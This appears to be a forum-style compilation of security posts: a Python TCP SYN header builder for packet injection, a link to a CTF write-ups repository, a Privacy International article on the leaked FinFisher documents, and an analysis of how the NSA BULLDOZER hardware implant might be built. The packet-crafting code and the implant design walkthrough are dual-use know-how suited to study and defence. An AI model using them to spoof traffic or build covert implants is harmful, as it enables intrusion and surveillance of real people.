RST: Request to reset a connection
FIN: Request to interrupt (close) a connection
PSH: Informs TCP that data should be sent immediately (useful in real-time applications)
URG: Urgent Pointer field is significant

Window: The number of data bytes that can be sent before the sender must stop and wait for an acknowledgment.

Checksum: Used for error-checking of the header and data.

Urgent Pointer: If the URG control flag is set, this field is an offset from the sequence number indicating the last urgent data byte. This feature is used when some information has to reach its destination as soon as possible.

Article: TCP Packet Injection with Python | Python for Pentesting
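The field layout above maps directly onto a struct.pack format string. The sketch below (my own illustration; the addresses, ports and window size are arbitrary) builds a 20-byte TCP SYN header and fills in the checksum, which is computed over a pseudo-header containing the source and destination IP addresses:

```python
import struct
import socket

def checksum(data):
    """Ones'-complement sum over 16-bit words (RFC 1071 style)."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) + data[i + 1]
    while total >> 16:                        # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_tcp_header(src_ip, dst_ip, src_port, dst_port, seq=0, flags=0x02):
    """Build a 20-byte TCP header (SYN by default) with a valid checksum."""
    offset_flags = (5 << 12) | flags          # data offset = 5 words + control bits
    hdr = struct.pack("!HHLLHHHH", src_port, dst_port, seq, 0,
                      offset_flags, 8192, 0, 0)
    # The checksum covers a pseudo-header (IPs, protocol, length) + TCP header
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src_ip),
                         socket.inet_aton(dst_ip), 0,
                         socket.IPPROTO_TCP, len(hdr))
    csum = checksum(pseudo + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]
```

To actually inject the result you would prepend an IP header and write it to a raw socket (socket.SOCK_RAW with the IP_HDRINCL option), which requires root privileges.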
-
[h=1]CTF write-ups[/h]

There are some problems with CTF write-ups in general:

- they're scattered across the interwebs
- they don't usually include the original files needed to solve the challenge
- some of them are incomplete or skip 'obvious' parts of the explanation, and are therefore not as helpful for newcomers
- often they disappear when the owner forgets to renew their domain or shuts down their blog

This repository aims to solve those problems. It's a collection of CTF source files and write-ups that anyone can contribute to. Did you just publish a CTF write-up? Let us know, and we'll add a link to your post — or just add the link yourself and submit a pull request. Spot an issue with a solution? Correct it, and send a pull request.

Link: https://github.com/ctfs/write-ups
-
Six things we know from the latest FinFisher documents

By: Kenneth Page on: 15-Aug-2014

The publishing of materials from a support server belonging to surveillance-industry giant Gamma International has provided a trove of information for technologists, security researchers and activists. It has given the world direct insight into a tight-knit industry that demands secrecy for itself and its clients, but ultimately assists in the violation of the human rights of ordinary people without care or reproach. Now, for the first time, there is solid confirmation of Gamma's activities from inside the company's own files, despite its denials, covering its clients and the support provided to a range of governments.

The Anglo-German company Gamma International is widely known for the intrusion software suite FinFisher, which was spun off into its own German-based company, "FinFisher GmbH", sometime in 2013. The 40GB dump of internal documents, brochures, pricelists, logs, and support queries was made available through a torrent first linked to in a Reddit post by the alleged hacker, who also set up a Twitter handle posting the documents.

While these documents do provide insight into FinFisher, Privacy International does not support any attempt to compromise the security of any company's network or servers. Greater transparency is needed from this sector, and from governments, on this growing industry to ensure that every business's obligation to respect human rights is met. Some documents provide new information; others support and verify previous claims about the company. Privacy International is still reviewing and analysing all the documents, so we expect more information to come out of them in the near future.

1. No targeting of Germany

FinFisher's command and control servers have been found in nearly 40 countries around the world.
But these new documents reveal that FinFisher customers cannot target devices in Germany, according to a clause contained within what appears to be a generic commercial offer the company provides to all its customers. Article 21 of a commercial offer states:

The BUYER hereby acknowledges that it is a strict term of this supply contract that it will not use the articles supplied in obtaining any data or software from any computer or related devices or impairing or interfering in the operation of any computer where, in either such case, there is significant link (however arising) in relation to such action or on relation to any other relevant circumstances, with Germany and hereby undertakes and warrants to FinFisher that it will not make use of the articles supplied

It is an odd clause to be contained within an offer. FinFisher is designed to work on a target machine regardless of location; a key selling point of FinFisher is the ability to monitor a target anywhere in the world. It is unclear why the buyer is specifically banned from using FinFisher to target devices in Germany, but there are a couple of reasonable possibilities. The first is that it is a condition imposed by the German government, allowing FinFisher to be based in and exported from Germany only if it is not used against German targets. It is also possible that FinFisher itself is looking to minimise any attention it gets in Germany, be it from security agencies or the press. It could also well be a legal precaution related to computer misuse legislation, designed to minimise legal accountability.

Privacy International has written to the German Federal Office for Economic Affairs and Export Control (BAFA) asking for clarification, and to assess whether the German government requires or is aware of such a clause prohibiting the targeting of German devices using German-made surveillance technology exported out of the country.

2.
The targeting of activists

The Gamma documents also cast doubt on Gamma's previous claim that the Bahraini government used a stolen demonstration copy of FinFisher against pro-democracy activists. Excellent work by Bahrain Watch signals that the Bahraini government reportedly targeted a range of prominent Bahraini lawyers, human rights workers, and politicians. Zeroing in on specific information related to Bahrain, the group claims to have identified 77 computers of activists targeted by FinFisher.

It was the allegations and technical analysis of 2012, indicating that Gamma's products were used to spy on Bahraini pro-democracy activists, that really began to show the truly invasive implications and violations associated with the company's technology. The new, potentially damning evidence comes in the form of communications between the supposed Bahraini authorities and Gamma's support service, again an element of the company's comprehensive support package. Logs show requests for assistance in solving problems occurring in the deployment of the malware, including that some anti-virus programs were detecting its presence, login details were not working, the 'targets' were not appearing, and so on.

These documents and the subsequent analysis by Bahrain Watch give credence to long-suspected behaviour of the Bahraini government when it comes to targeting activists with FinFisher, and call into question Gamma's previous statements on its relationship with Bahrain. Several of the individuals identified by Bahrain Watch are now either imprisoned or sentenced in absentia, showing the on-the-ground impact and role of surveillance technologies in the hands of repressive regimes.

3. The industry is slick

Once a negligible industry in 2001, within ten years the sector was estimated to be worth approximately $5 billion annually, and to be growing by 20% every year.
By the end of 2014, the ISS World trade fairs (the so-called 'Wiretappers' Ball') will have been held in Washington DC, Prague, Brasilia, Johannesburg, Dubai and Kuala Lumpur, reflecting how the industry has stretched its tentacles to all corners of the world, selling to essentially any and all governments who deem its tools 'necessary'. The Gamma documents show the company's attendance at multiple exhibitions, extending beyond ISS World and into specialised security and defence exhibitions, including the "Security and Policing" fair in Farnborough, UK, the "LAAD Defence and Security Expo" in Rio, and "FBI Executives Training" in San Antonio, Texas, amongst others.

What is noticeable is not merely the provision of software and hardware, much of which was already known to those active in the area, but the sense of the industry becoming 'established' and attempting to operate like any other normal international business. The latest Gamma brochures and presentations show the slicker side of the company and can be taken as representative of the modern industry: a highly professionalised sector with PR and marketing language directed at law enforcement and government agencies, presenting surveillance products as the comprehensive solution to any tricky problem. Paying attention to 'the little things' is a sign of a well-established and professional sector, and Gamma displays this in one of its trade-fair attendance spreadsheets, detailing which member of staff was due to send follow-up emails to interested individuals afterwards.

4. They do more than just sell

We've previously shown how surveillance companies do not only sell the products found in these brochures. Beyond developing and marketing, companies like Gamma provide an extensive consulting service, helping install the equipment, getting surveillance teams up and running, and lending IT support for any technical problems the software encounters.
The provision of services beyond merely supplying the initial software or hardware is strikingly illuminated by these new documents, which show first-hand the technical and customer support offered to clients. Specifically, the new documents say that the products are subject to regular updates due to technical advances, "therefore an annual support contract is required to received such upgrades and updates" [FF License Renewal Template 23.01.14]. Similarly, in the leaked pricelist, line entries show charges for post-sales support and update licences for up to 5 years, showing a consistent support mechanism for the client.

The training documents detail the depth of the training given by Gamma employees to their government clients. For example, with the FinIntrusion Kit 2.2, clients are trained how to conduct network intrusion, how to search for and identify victims, break WEP and WPA encryption, jam wireless networks, and extract usernames and passwords for everyday services like Gmail, Hotmail, and Facebook. When it comes to training governments on how to use their malware, the Gamma documents show how quickly authorities can be brought up to speed on the surveillance equipment: a basic intrusion course takes five days, while an extended course needs 10 days.

5. Relationships with other companies

The symbiotic relationships between the leading firms have long been suspected, and small elements of this collusion have been revealed previously. Gamma International has been shown to have worked hand-in-glove with two Swiss companies, Dreamlab and Elaman, supplying surveillance equipment to regimes such as Turkmenistan. These new Gamma documents confirm this is an established business partnership, revealing the role of both Swiss-based companies in reselling Gamma's products and training clients in the field. Other documents show that the new FinFisher company and Elaman even have the same address.
The training price-lists show the cooperation between these three distinct companies. If a government purchases a Gamma product from Elaman, it receives a discount of 25% on software and support, while a discount of 15% is on offer for hardware and training, according to the pricelist. A slightly less generous discount of 20% and 10% is on offer for other agents and resellers, demonstrating the widespread partnerships throughout the industry. Alongside the training services offered by Gamma, it's noticeable that they advertise the capabilities of the trainers from Dreamlab, who clearly come highly recommended for their knowledge of infrastructure, as they command five times the salary of a Gamma staff member for in-country training.

Through an examination of the line-by-line price-list, we see a window into the range and cost of services on offer. The breakdown shows wholly customisable services for the client: activation licences for FinSpy Mobile targeting Blackberry, Windows Mobile, iPhone, Symbian and Android; licences for After Sales Support and Updates for up to 3 years; user manuals; desktop workstations; specific laptops; as well as a critical evolution in the industry, access to the 'Exploit Portal' of the French vulnerability developer VUPEN.

We've highlighted in the past Gamma's role in pushing 0-day exploits, and VUPEN's role in this market. Ties between VUPEN and Gamma/FinFisher have long been public and friendly, but the pricelist and documents confirm a business relationship between governments, Gamma, and VUPEN's large database of exploits. In this transaction, VUPEN sells exploits to be used in the FinSpy exploit portal, which Gamma/FinFisher then turn around and sell to their customers. A Frequently Asked Questions document within the Gamma files shows that the company, when selling exploits, is apparently often asked where the vulnerabilities come from. "Q: Can we name the supplier?
A: Yes you can mention that we work with VUPEN here."

We can now compare two pricelists from Gamma: the 2011 release and the new one. In 2011, a FinSpy Relay, Master, and Generation Licence for between one and 10 targets cost a government €100,000. By the end of 2013 we see a whopping 20% increase, with the same service now costing €120,000. The FinSpy PC activation licence covered Windows and OS X at a cost of €1,950, but by 2013 this had increased to €2,340 and included licences for Linux.

6. The technology has evolved

FinFisher, which takes complete control over a target's device once infected, came to international prominence in 2011 when documents uncovered in the aftermath of the Arab Spring showed its use by the Egyptian security services. The same year saw Wikileaks' SpyFiles 2 release, showing various documents including training videos for Gamma's products, i.e. FinSpy Mobile, FinUSB, and FinFly. Subsequent publications of brochures in SpyFiles 3 and our own Surveillance Industry Index continued to document what the company is selling.

Gamma themselves describe their prospective clients as ranging from intelligence agencies, air force, navy and army groups, to customs departments and presidential guards. Such a sophisticated clientele demands cutting-edge solutions and technology that is consistently evolving and progressing. The Gamma documents show this evolution through constant communication with clients about forthcoming enhancements and versions with better capabilities. The presentations and training documents show the progression of intrusion techniques, pushing past 'traditional passive monitoring' for problems 'that can only be solved by adding IT intrusion solutions'. Gamma themselves highlight the 'global mobility of devices and targets' as a problem that needs to be 'solved', as well as anonymity through the use of hotspots, proxies, and webmail, also referencing Tor.
The provision of 'roadmaps' shows clients when updates for their purchases will be available, and details the features of the new versions. For example, these roadmaps reveal new versions and enhancements of the invasive FinSpy Mobile. Version 4.4, released in Q4 2012, has the ability to collect data through Skype across the iOS, Blackberry, Android, and Windows Mobile platforms. An updated version 4.5, released in Q1 2013, included the ability to capture emails, calendars, and keystrokes on Windows Phones, and an updated ability to collect data through the camera of a Blackberry or iOS phone.

It is important to add that more analysis will be needed to fully piece together and chart the progress of Gamma's intrusion software. As we continue to analyse these documents, we will publish more information.

Source: https://www.privacyinternational.org/blog/six-things-we-know-from-the-latest-finfisher-documents
-
This article is the second part of a series on NSA BIOS backdoor internals. This part focuses on BULLDOZER, a hardware implant acting as a malware dropper and wireless communication "hub" for NSA covert operations. Although BULLDOZER is hardware, I still use the word "malware" when referring to it, because it is malicious hardware. Perhaps the term "malware" should refer to both malicious software and malicious hardware, instead of only the former.

I'd like to point out why BULLDOZER is classified as "god mode" malware. Unlike DEITYBOUNCE, BULLDOZER is not a name from the realm of the "gods". However, BULLDOZER provides capabilities similar to a "god mode" cheat in video games, which makes the player using it close to invincible, to its payload, GINSU. Therefore, it is still suitable to be called god mode malware. The presence of BULLDOZER is very hard to detect, even with the most sophisticated anti-malware tools available during its possible deployment timeframe. As for GINSU, we will look into GINSU in detail in the next installment of this series.

The NSA ANT server document, leaked by Edward Snowden, describes BULLDOZER briefly. This article presents an analysis of BULLDOZER based on the technical implications of the information provided by the NSA document. Despite lacking many technical details, we can still draw a technically sound analysis of BULLDOZER based on the BIOS and hardware technology of the day BULLDOZER became operational, just as in the DEITYBOUNCE case.

Introduction to the GINSU-BULLDOZER Malware Combo

BULLDOZER doesn't work in isolation; it has to be paired with the GINSU malware to work. As you will see in the next installment of this article, GINSU is a malicious PCI expansion ROM. Therefore, at this point, let's just assume that GINSU is indeed a malicious PCI expansion ROM and BULLDOZER is the hardware where GINSU runs.
This means BULLDOZER is a PCI add-in card, which is in line with the information in the NSA ANT server document. Before we proceed to analyze BULLDOZER, let's look at the context where GINSU and BULLDOZER operate, because understanding that context is necessary to understand their inner workings. GINSU and BULLDOZER are a software and hardware combo; both must be present at the same time to work. Figure 1 shows the deployment of GINSU and BULLDOZER in the target network.

Figure 1 GINSU Extended Concept of Operations. Courtesy: NSA ANT Product Data

Figure 1 shows the BULLDOZER hardware implanted in one of the machines in the target network. The NSA Remote Operation Center (ROC) communicates via OMNIGAT with the exploited machine through an unspecified wireless network. This implies the GINSU-BULLDOZER malware combo targets machines in air-gapped networks, or machines located in a network that is hard, but not impossible, to penetrate. In the latter case, using machines with malware-implanted hardware is more economical and/or stealthier than an "ordinary" computer network intrusion approach.

Let's look closer at the technical information revealed by the NSA ANT product data document before we proceed to deeper technical analysis. The NSA ANT server product data document mentions:

GINSU provides software application persistence for the Computer Network Exploitation (CNE) implant—codenamed KONGUR—on systems with the PCI bus hardware implant, BULLDOZER. The technique supports any desktop PC system that contains at least one PCI connector (slot) and uses Microsoft Windows 9x, 2000, 2003 Server, XP, or Vista. The PCI slot is required for the BULLDOZER hardware implant installation. BULLDOZER is installed in the target system as a PCI hardware implant through "interdiction"—a fancy word for installing additional hardware in the target system while it is being shipped to its destination.
After fielding, if KONGUR is removed from the system as a result of an operating system upgrade or reinstallation, GINSU can be set to trigger on the next reboot of the system to restore the software implant.

It's clear from the four points of information above, and from Figure 1, that there are three different components in the GINSU-BULLDOZER combo. They are as follows:

The first component is GINSU. The GINSU code name is actually rather funny, because it refers to a knife that was very popular in the 1980s and 1990s via direct-sell marketing. Perhaps the creator of the GINSU malware was referring to the Ginsu knife's above-average capability to cut through various materials. GINSU is possibly a malicious PCI expansion ROM—PCI expansion ROM is also called PCI option ROM in many PCI-related specifications; I will use both terms in this article. GINSU might share some modules with DEITYBOUNCE, because both are malicious PCI expansion ROMs—see the DEITYBOUNCE analysis at NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute. However, it differs in many other aspects. First, GINSU runs on the NSA custom PCI add-in card, codenamed BULLDOZER. Therefore, GINSU could be much larger in size than DEITYBOUNCE, because the NSA controls the size of the flash ROM on the PCI add-in card. This means GINSU could incorporate many more functions than DEITYBOUNCE. Second is the type of PCI add-in card that GINSU might use. From Figure 1, the GINSU hardware (BULLDOZER) seems to masquerade as a WLAN PCI add-in card or another kind of PCI add-in card for wireless communication. This implies that the PCI class code of the BULLDOZER chip that contains GINSU is probably not that of a PCI mass storage controller like the one used by DEITYBOUNCE. Instead, the BULLDOZER PCI chip very possibly uses a PCI wireless controller class code.

The second component is named BULLDOZER.
This codename perhaps refers to the capability of a bulldozer to push large quantities of material to its intended place, which in the context of GINSU means the capability to push the final payload (KONGUR) to the target systems. In this particular malware context, BULLDOZER refers to the PCI add-in card (hardware) implant installed in the target machine. BULLDOZER is a custom PCI add-in card. It very probably masquerades as a PCI WLAN add-in card, because it provides a wireless communication function that requires a certain kind of antenna. However, this doesn't prevent BULLDOZER from masquerading as another kind of PCI add-in card; the presence of a physically larger antenna in a PCI WLAN card could boost the wireless signal strength, so the NSA might use the PCI WLAN card form factor to their advantage. We will look deeper into the BULLDOZER implementation later.

The third (last) component is named KONGUR. KONGUR is a somewhat mysterious name. It may refer to the Kongur Tagh mountain in China's Xinjiang-Uyghur Autonomous Region. This could possibly mean that the GINSU-BULLDOZER combo was devised for a campaign to infiltrate Chinese computer systems. After all, the Xinjiang-Uyghur Autonomous Region is famous for its people's rebellion against the Chinese central government. This doesn't mean that the GINSU-BULLDOZER combo wasn't used against other targets in other campaigns, though. KONGUR is a Windows malware that targets Windows 9x, 2000, XP, Server 2003 and Vista. GINSU provides the delivery and reinstallation mechanism for KONGUR. We can view KONGUR as the payload of the GINSU-BULLDOZER combo. It's possible that KONGUR also works on Windows Vista derivatives, such as Windows 7 and Windows Server 2008, or even later Microsoft operating systems (OS) such as Windows 8, Server 2012, and 8.1, because KONGUR targets Windows Vista and we don't know which 0-day exploit it uses or whether that exploit has been patched.
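The option-ROM hypothesis above is mechanically checkable: an x86 PCI expansion ROM image starts with the 0x55AA signature, stores its size in 512-byte units at offset 2, and carries a pointer (at offset 0x18) to a "PCIR" data structure recording the vendor/device IDs and the class code discussed above (base class 0x02 is a network controller). The following parser is my own sketch against that published layout, not NSA or vendor code:

```python
import struct

def parse_option_rom(rom):
    """Parse the legacy header and PCIR block of a PCI expansion ROM image."""
    if rom[0:2] != b"\x55\xaa":
        raise ValueError("missing 0x55AA expansion ROM signature")
    size_512 = rom[2]                              # image size in 512-byte units
    pcir_off = struct.unpack_from("<H", rom, 0x18)[0]
    if rom[pcir_off:pcir_off + 4] != b"PCIR":
        raise ValueError("missing PCIR data structure")
    vendor_id, device_id = struct.unpack_from("<HH", rom, pcir_off + 4)
    # Class code occupies 3 bytes at offset 0x0D of the PCIR structure:
    # programming interface, subclass, base class (in that order)
    prog_if, sub_class, base_class = rom[pcir_off + 0x0D:pcir_off + 0x10]
    return {
        "size_bytes": size_512 * 512,
        "vendor_id": vendor_id,
        "device_id": device_id,
        "class_code": (base_class, sub_class, prog_if),
    }
```

Running such a parser over a dumped ROM would immediately show whether an add-in card advertises itself as a network-class device, though a well-made implant could of course lie in these fields.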
This article doesn't delve deep into KONGUR and GINSU; the focus is on the hardware delivery mechanism, the BULLDOZER malware. The GINSU-BULLDOZER malware combo is the second NSA BIOS malware we have looked into that "abuses" the PCI expansion ROM, after DEITYBOUNCE. We could say that the NSA is quite fond of this technique, though, as you will see later, it's a justified fondness. Anyway, this hypothesis on the GINSU-BULLDOZER combo is bound to have subtle inaccuracies, because I have no sample of the malware combo to back up my assertions. I'm very open to constructive criticism in this regard.

Now we are going to look into the BULLDOZER technical details. However, if you're not yet familiar with the PCI bus protocol, please read the first part of this series (NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute). There are links in that article that further break down the required prerequisite knowledge, in case you're not up to speed yet.

BULLDOZER: NSA Malicious PCI Add-In Card

In this section we delve into the details of the procedures that the NSA probably carries out to create the BULLDOZER hardware implant. Surely, the exact type of hardware used by the NSA may very well be different. However, I try to draw the closest analogy possible from public-domain knowledge. Despite the NSA's superiority compared to the private sector, all of us are bound by the laws of physics and must adhere to the hardware protocols of the target systems; therefore, the NSA's approach to building BULLDOZER couldn't be that much different from the explanation in this article. In the BULLDOZER Implementation Recap section, I try to draw the most logical hypotheses on the BULLDOZER hardware implant, based on the process of designing and creating a PCI add-in card similar to BULLDOZER.

PCI add-in cards are installed in PCI expansion slots on the motherboard. Figure 2 shows a PCI add-in card sample.
This PCI add-in card is a PCI WLAN card. Figure 2 highlights the PCI "controller" chip from Ralink—a WLAN controller—and the PCI slot connector on the add-in card. The term "controller" is a generic name given to a chip that implements the core function of a PCI add-in card. PCI hardware development documentation typically uses this term, as do PCI-related specifications.

Figure 2 PCI add-in card sample. Courtesy: D-Link.

I use a PCI WLAN card as an example because the GINSU extended concept of operations implies that the BULLDOZER hardware implant is a PCI wireless controller card. What kind of wireless protocol it uses, we don't know. But the point is, BULLDOZER could masquerade as a PCI WLAN card for maximum stealth; it would look innocuous that way. Figure 2 doesn't show the presence of any flash ROM on the PCI add-in card. A PCI add-in card typically stores its PCI option ROM code in flash ROM. The purpose of Figure 2 is just to show you the typical appearance of a PCI add-in card for wireless communications. We'll get into the flash ROM stuff later on.

PCI Add-In Card in OEM Desktop PC Circa 2008

Now, let's look at how a typical 2008 desktop PC could be implanted with such a card. One of the desktop PCs from a system builder that still had PCI slots in 2008 is the Lenovo ThinkCentre M57 desktop PC. I chose a Lenovo desktop PC as an example because its products were widely used in China, besides other parts of the world. It could probably be one of the victims of the GINSU-BULLDOZER campaign; who knows? The Lenovo ThinkCentre M57 has two PCI slots. Let's say the NSA "interdicts" such a system. They can install BULLDOZER in it and then replace the user guide as well, to make the BULLDOZER implant look like a legitimate PCI add-in card that comes with the PC, just in case the user checks the manual before using the system.
Figure 3 Lenovo ThinkCentre M57 PCI Add-In Card Replacement Instructions (edited version of the original ThinkCentre Hardware Maintenance Manual instructions). Courtesy: Lenovo.

The Lenovo ThinkCentre Hardware Maintenance Manual even comes with instructions to replace a failed PCI add-in card. Figure 3 shows the instructions for replacing a PCI add-in card in an "exploded view" style. Following the hardware replacement instructions shown in Figure 3 is a pedestrian task; any NSA field agent can do it.

PCI Wireless Communication Add-In Card Hardware and Software Co-Development

Now let's look at the steps to develop a PCI wireless communication add-in card in general, because we presume that BULLDOZER falls within this PCI add-in card category. I'm quite sure the NSA also follows the approach explained here, despite being a very advanced spying agency; only the tools and hardware it uses are probably different—perhaps custom-made. From a cost point of view, using a Commercial Off-The-Shelf (COTS) approach in creating the BULLDOZER hardware would be more cost-effective, i.e. using tools already on the market costs much less than building custom tools. COTS solutions benefit from economies of scale and competition in the market. Moreover, from an operational standpoint, the GINSU-BULLDOZER target systems would likely evolve after five years, which dictates the use of new tools; therefore, obsolescence, which usually plagues COTS solutions, is not a problem for the GINSU-BULLDOZER campaign. The latter fact strengthens my suspicion that the NSA very probably uses the COTS approach. We'll look at this COTS approach shortly.

The "crude" steps to develop a PCI add-in card and its assorted software in general—via the COTS approach—are as follows:

1. High-level design. This step involves the high-level decisions on what kind of PCI controller chip would be created for the PCI add-in card, what features the chip would implement, and what auxiliary support chip(s) are required.
For example, in the case of a PCI wireless communication add-in card, you will typically need a separate Digital Signal Processor (DSP) chip, or you need to buy the DSP logic design from a DSP vendor and incorporate that design into your PCI Field Programmable Gate Array (FPGA). Hardware prototyping. This step involves creating the PCI controller chip prototype with a PCI FPGA development board. The language used to develop the PCI controller chip in the FPGA is typically either VHDL or Verilog; this mostly depends on the FPGA vendor. Software (device driver) development. This step involves creating a prototype device driver for the PCI add-in card for the target Operating System (OS). For example, if the device will be marketed mostly to Windows users, then creating a Windows device driver takes priority. Drivers for other target OSes would be developed later, or probably not at all if market demand for the alternative OS doesn’t justify the cost of developing the driver. This step is typically carried out in parallel with hardware prototyping once the first iteration of the FPGA version of the chip is available. Some FPGA vendors provide a “template” driver for certain target OSes to help with driver development. This way, driver development can run in parallel with the chip design. There are also third-party “driver template” vendors endorsed by the FPGA vendors, such as Jungo WinDriver—see http://www.jungo.com/st/products/windriver/. Chip fabrication, also known as the making of the Application-Specific Integrated Circuit (ASIC). In this step, the first design revision of the chip is finished and the design is sent to a chip fabrication plant, such as TSMC, UMC, or another contract semiconductor fab. This is an optional step though, because some low-volume PCI add-in cards these days are made out of FPGAs anyway. 
If the cost of chip fabrication doesn’t make economic sense against building the product out of an FPGA, then the final product simply uses the FPGA. Well, the NSA has several semiconductor fabs—for example, see NSA plant in San Antonio shrouded in secrecy - Houston Chronicle. One of the NSA’s fabs was probably used to fabricate the BULLDOZER PCI controller chip. Compatibility testing of the PCI hardware-software “combo”. The chip vendor carries out the compatibility testing first. If the target OS is Windows, Microsoft also carries out additional compatibility testing, the so-called WHQL (Windows Hardware Quality Labs) testing: Microsoft’s testing process, which involves running a series of tests on third-party hardware or software and then submitting the log files from these tests to Microsoft for review. In case the primary target OS is not Windows, only the test from the hardware vendor is carried out. The NSA very probably also carries out this kind of test, but for an entirely different purpose, i.e. to make sure the driver works as stealthily as possible or to mislead the user into thinking the driver is just an ordinary PCI device driver. Steps 2 and 3 are actually iterative. The PCI hardware prototype goes through several iterations until it matures and is ready for fabrication. Step 4 could also be iterative, i.e. there could be several revisions of the chip. The first revision might have a flaw or performance weakness that must be improved, despite being a functional design. In the commercial world, ASICs typically go through several revisions. Each revision is marked as a “stepping”. You will find the word “stepping” mentioned in many CPU, chipset, or System-on-Chip (SoC) technical documents. “Simulating” BULLDOZER Hardware Now, let’s look into the process of developing a specific PCI add-in card, i.e. 
a PCI add-in card with wireless communication as its primary function. We focus on this kind of PCI add-in card because BULLDOZER connects to the outside world—to OMNIGAT in Figure 1—via an unspecified wireless connection. For this purpose, we look into the hardware prototyping step in more detail. Let’s start with some important design decisions needed to emulate BULLDOZER’s capabilities, as follows: The prototype must have the hardware required to develop a custom wireless communication protocol. The reason is that the wireless communication protocol used by BULLDOZER to communicate with OMNIGAT must be as stealthy as possible, despite probably using the same physical antenna as a PCI WLAN card. The prototype must implement PCI expansion ROM hardware. The reason is that GINSU is malicious PCI expansion ROM code that must be stored in a functional PCI expansion ROM chip to work. GINSU is configurable, or at the very least it can be optionally triggered—based on the NSA ANT server document. This means there must be some sort of non-volatile memory in the prototype to store GINSU parameters. It could be in the form of a Non-Volatile RAM (NVRAM) chip, as in the DEITYBOUNCE case. Storing the configuration data in a flash ROM or other kind of ROM is quite unlikely, given that flash ROM requires a rather complicated procedure to rewrite. The next step is to choose the prototyping kit for the hardware. There are many PCI FPGA prototyping boards on the market. We will look into one of them from Sundance (DSP and FPGA Solutions - Sundance Multiprocessor Technology Ltd.). Sundance is probably a very obscure vendor to you. However, it is one of the vendors that provide a PCI development board for Software-Defined Radio (SDR) applications. You might be asking, why would I pick a PCI SDR development board as an example? The reason is simple: SDR is the best approach when you want to develop your own wireless protocol. 
You can tune the frequency, the type of modulation, the transmitter power profile, and the other parameters needed to make the protocol as stealthy as possible. BULLDOZER Hardware “Simulation” with Sundance SMT8096 SDR Development Kit There is usually more than one FPGA in a typical PCI SDR development board. We are going to look into one of Sundance’s products that was available in the market before 2008—the year the GINSU-BULLDOZER malware combo was operational. I picked the Sundance SMT8096 SDR development kit as the example in this article. This kit was available in the market circa 2005. The kit consists of several connected boards, with a “PCI carrier” board acting as the host of all of the connected boards. The PCI carrier board connects the entire kit to the PCI slot in the development PC. Figure 4 shows the entire Sundance SMT8096 SDR development kit hardware. Figure 4 Sundance SMT8096 SDR development kit. Courtesy: Sundance Multiprocessor Technology Ltd. Figure 4 shows the components of the Sundance SMT8096 SDR development kit. As you can see, the development kit consists of several circuit boards, as follows: The SMT395-VP30 board, which contains the Texas Instruments C6416T DSP chip and the Xilinx Virtex II Pro FPGA. The C6416T DSP chip provides the primary signal processing in the development kit, while the Virtex II FPGA provides the reconfigurable signal processing part. In fact, it’s the FPGA on this board that puts the “software” in “software-defined radio”. The SMT350 board provides the Analog-to-Digital Converter (ADC) / Digital-to-Analog Converter (DAC) functions. This board provides two functions. First, it receives the analog input from the input antenna and then converts that input into its equivalent digital representation before feeding the result to the signal processing board. 
Second, it receives the digital output of the signal processing board and converts that digital signal into an analog signal to be fed into the output antenna. The input and output antennas could be the same or different, depending on the overall design of the SDR solution. The SMT368 board provides yet another FPGA, a Xilinx Virtex 4 SX35. This board provides the “protocol/data-format” conversion function, as you can see in Figure 5 (Sundance SMT8096 SDR development kit block diagram). SMT310Q is the PCI carrier board. It’s this board that connects to the host (desktop PC) motherboard via the PCI connector. This board provides the PCI logical and physical interface to the host PC. Figure 5 shows the block diagram of the entire SDR development kit. It helps in understanding the interactions between the SDR development kit components. Figure 5 Sundance SMT8096 Development Kit Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Let’s look into the SMT310Q PCI carrier board, because this board is the one visible from the motherboard BIOS perspective. We’ll focus on the technology required to communicate with the host PC instead of the technology required for the wireless communication, because we have no further clues on the latter. Moreover, I’m by no means an expert in radio communication technology. The SMT310Q PCI carrier board has a QuickLogic V363EPC PCI bridge chip, which conforms to the PCI 2.1 specification. This chip was developed by V3 Semiconductor, before the company was bought by QuickLogic. The V363EPC PCI bridge connects the devices on the SMT8096 development kit to the host PC motherboard—both logically and electrically—via the PCI slot connector. This PCI bridge chip is not a PCI-to-PCI bridge; rather, it’s a bridge between the custom bus used in the SMT8096 development kit and the PCI bus in the host PC. The correct term is Local Bus to PCI Bridge. 
Local bus in this context refers to the custom bus in the SMT8096 development kit—used for communication between the chips on the development kit boards. At this point we have made the important design decisions, we have picked the PCI hardware development kit to work with, and we have looked into the PCI-specific chip in the development kit. It’s time to get into the details of the design implementation. The steps to implement the design are as follows: Assuming the wireless communication protocol has been defined thoroughly, the first step is to implement the protocol in the form of DSP chip firmware code and FPGA designs. The DSP chip firmware code consists of initialization code required to initialize the DSP chip itself, code to initialize the interconnection between the DSP chip and the Local Bus to PCI Bridge via the Local Bus interface, and code for other auxiliary functions. Assuming we use the Sundance SMT8096 kit, this step consists of creating the firmware code for the Texas Instruments C6416T DSP chip and creating the FPGA designs for the Xilinx Virtex-II and Xilinx Virtex-4 SX35. We are not going to delve into the details of this step, as we don’t know the specifics of the wireless communication protocol. The second step is to customize the hardware to support the PCI expansion ROM. This is required because we assume the GINSU malware is malicious PCI expansion ROM code. In this step we configure the SMT310Q carrier board to support the PCI expansion ROM, because this board is the one that interfaces with the host (x86/x64 desktop) PCI bus, both at the logical and physical level. We have to enable the Expansion ROM Base Address Register (XROMBAR) in the QuickLogic V363EPC PCI bridge chip (Local Bus to PCI Bridge) on the SMT310Q carrier board via hardware configuration, and we have to provide a flash ROM chip on the board to store the PCI expansion ROM code as well. 
